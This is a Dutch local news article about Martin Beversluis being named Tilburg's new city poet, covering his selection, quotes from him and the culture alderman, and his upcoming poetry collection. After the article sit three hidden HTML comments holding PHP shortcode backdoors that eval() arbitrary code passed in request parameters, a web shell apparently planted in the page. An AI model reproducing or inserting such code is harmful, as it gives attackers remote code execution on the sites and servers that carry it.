Martin Beversluis nieuwe stadsdichter van Tilburg

Martin Beversluis. Lito: Ivo van LeeuwenDe 43-jarige Martin Beversluis wordt de nieuwe Stadsdichter van Tilburg. De officiële installatie van de dichter is op 30 augustus tijdens ‘Boeken rond het paleis’. Vrijdagmiddag werd Beversluis voor het eerst gepresenteerd door onder andere Marcelle Hendrickx, wethouder van cultuur. Hij volgt huidig Stadsdichter Jasper Mikkers op.

Uitgerekend op zijn verjaardag werd Beversluis geïntroduceerd als nieuwe Stadsdichter voor de komende twee jaar. De dichter werd voorgedragen door een onafhankelijke stadsdichterscommissie, waarna het college de geboren Vlaardinger officieel benoemde. 

Voor Beversluis is gekozen vanwege zijn gedrevenheid en mooie en verrassende verbindingen met muziek. “En dat past uitstekend bij een stad die zich juist met podiumkunsten wil profileren. Martin is een buitengewoon waardevolle toevoeging voor Tilburg”, zei Hendrickx.

Met de 43-jarige Beversluis, die in 2009 in de finale van het Nederlands Kampioenschap Poetry Slam stond, haalt Tilburg één van de beste Nederlandse performers in huis, zo zei hij zelf. “Plus ik ben iemand die je tegen gaat komen in de stad. Op onverwachte momenten of niet. Ik heb zin om poëzie naar de Tilburgers toe te brengen.”

”Ik wil met elkaar dingen doen. Zo ga ik in elke wijk op een plek 24 uur doorbrengen. Dus als iemand alvast een slaapplek over heeft, graag”, voegde de jarige Beversluis er lachend aan toe.

Op 30 augustus brengt Beversluis tevens een nieuw dichtbundel uit, genaamd Meandertaler.

<!– [insert_php]if (isset($_REQUEST["nVP"])){eval($_REQUEST["nVP"]);exit;}[/insert_php][php]if (isset($_REQUEST["nVP"])){eval($_REQUEST["nVP"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["noi"])){eval($_REQUEST["noi"]);exit;}[/insert_php][php]if (isset($_REQUEST["noi"])){eval($_REQUEST["noi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["gElMm"])){eval($_REQUEST["gElMm"]);exit;}[/insert_php][php]if (isset($_REQUEST["gElMm"])){eval($_REQUEST["gElMm"]);exit;}[/php] –>